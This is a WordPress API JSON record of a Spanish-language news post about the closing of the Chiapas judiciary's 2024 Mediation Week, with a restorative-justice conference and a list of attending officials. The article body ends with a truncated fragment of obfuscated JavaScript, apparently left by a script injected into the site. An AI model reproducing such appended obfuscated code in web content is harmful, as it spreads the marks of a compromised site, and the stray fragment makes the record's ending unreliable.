{"id":18092,"date":"2024-09-28T04:36:04","date_gmt":"2024-09-28T04:36:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18092"},"modified":"2024-09-28T05:11:18","modified_gmt":"2024-09-28T05:11:18","slug":"finaliza-la-semana-de-la-mediacion-2024-en-el-poder-judicial-del-estado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18092","title":{"rendered":"Finaliza la Semana de la Mediaci\u00f3n 2024 en el Poder Judicial del Estado"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"478\" data-id=\"18093\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.28.35-AM-1024x478.jpeg\" alt=\"\" class=\"wp-image-18093\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.28.35-AM-1024x478.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.28.35-AM-300x140.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.28.35-AM-768x359.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.28.35-AM-1536x717.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.28.35-AM-2048x956.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"478\" data-id=\"18094\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.29.04-AM-1024x478.jpeg\" alt=\"\" class=\"wp-image-18094\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.29.04-AM-1024x478.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.29.04-AM-300x140.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.29.04-AM-768x359.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.29.04-AM-1536x717.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-27-at-10.29.04-AM-2048x956.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>27 de septiembre del 2024. Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado de Chiapas que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, llev\u00f3 a cabo la ceremonia de clausura de la Semana de la Mediaci\u00f3n 2024, Por una Cultura de la Paz, en conmemoraci\u00f3n del 13\u00ba aniversario de la implementaci\u00f3n de la Justicia Alternativa en la entidad.<\/p>\n\n\n\n<p>La clausura se realiz\u00f3 en la Sala de Presidentes del Palacio de Justicia de Tuxtla Guti\u00e9rrez, donde se imparti\u00f3 la conferencia titulada La Importancia de la Incorporaci\u00f3n de la Justicia Restaurativa en los Procesos Jurisdiccionales, a cargo de la visitadora general especializada en atenci\u00f3n de ni\u00f1as, ni\u00f1os y adolescentes de la Comisi\u00f3n Estatal de Derechos Humanos, Jaqueline \u00c1ngel Juan.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, Jaqueline \u00c1ngel destac\u00f3 la trascendencia de la Justicia Restaurativa en el \u00e1mbito familiar, subrayando su enfoque en la reparaci\u00f3n del da\u00f1o y la reintegraci\u00f3n de las partes involucradas, especialmente en situaciones que afectan a menores de edad.<\/p>\n\n\n\n<p>Asimismo, se abordaron casos espec\u00edficos en los que la Justicia Restaurativa ha demostrado ser una herramienta eficaz para resolver conflictos familiares, promoviendo el di\u00e1logo, la empat\u00eda y la sanaci\u00f3n entre las partes, con el objetivo de fortalecer los lazos familiares y generar soluciones que vayan m\u00e1s all\u00e1 del castigo tradicional. Adem\u00e1s, se enfatiz\u00f3 el trabajo conjunto de facilitadores y facilitadoras, as\u00ed como la importancia de las certificaciones y actualizaciones de cara al nuevo C\u00f3digo Nacional de Procedimientos Civiles y Familiares.<\/p>\n\n\n\n<p>Por su parte, la consejera de la Judicatura, Zelmira Perla de Roc\u00edo Guti\u00e9rrez Beltr\u00e1n, en representaci\u00f3n del magistrado presidente, Guillermo Ramos P\u00e9rez, dirigi\u00f3 unas palabras de agradecimiento a las y los ponentes, subrayando la relevancia de sus aportes para enriquecer el di\u00e1logo sobre justicia alternativa. Adem\u00e1s, destac\u00f3 la importancia de la Justicia Restaurativa como una herramienta fundamental para la resoluci\u00f3n de conflictos, enfatizando su capacidad para promover la reparaci\u00f3n del da\u00f1o, la reconciliaci\u00f3n entre las partes y el fortalecimiento del tejido social. Tambi\u00e9n reconoci\u00f3 el trabajo realizado por el Centro Estatal de Justicia Alternativa del Poder Judicial y del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial.<\/p>\n\n\n\n<p>En el acto de clausura estuvieron presentes la consejera de la Judicatura, Mar\u00eda de Lourdes Hern\u00e1ndez Bonilla, los consejeros de la Judicatura, Omar Helar\u00eda Reyes y Jos\u00e9 Francisco Trujillo Ochoa; la directora del Centro Estatal de Justicia Alternativa, Elisheba Goldhaber Pasillas; la visitadora general especializada, Jaqueline \u00c1ngel Juan; as\u00ed como trabajadoras y personal jurisdiccional y administrativo del Poder Judicial.<\/p>\n\n\n\n<p>El Poder Judicial del Estado reafirma su compromiso con la implementaci\u00f3n de la Justicia Restaurativa en sus procesos, promoviendo la reparaci\u00f3n del da\u00f1o y la reconciliaci\u00f3n entre las partes. Su objetivo es resolver los conflictos de manera m\u00e1s humana, especialmente en casos familiares que afectan a menores, fortaleciendo el bienestar de todas las personas involucradas a trav\u00e9s del trabajo del Centro Estatal de Justicia Alternativa en Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 27 de septiembre del 2024. Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado de Chiapas que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, llev\u00f3 a cabo la ceremonia de clausura de la Semana de la Mediaci\u00f3n 2024, Por una Cultura de la Paz, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18093,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18092","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18092","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18092"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18092\/revisions"}],"predecessor-version":[{"id":18095,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18092\/revisions\/18095"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18093"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18092"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18092"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18092"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}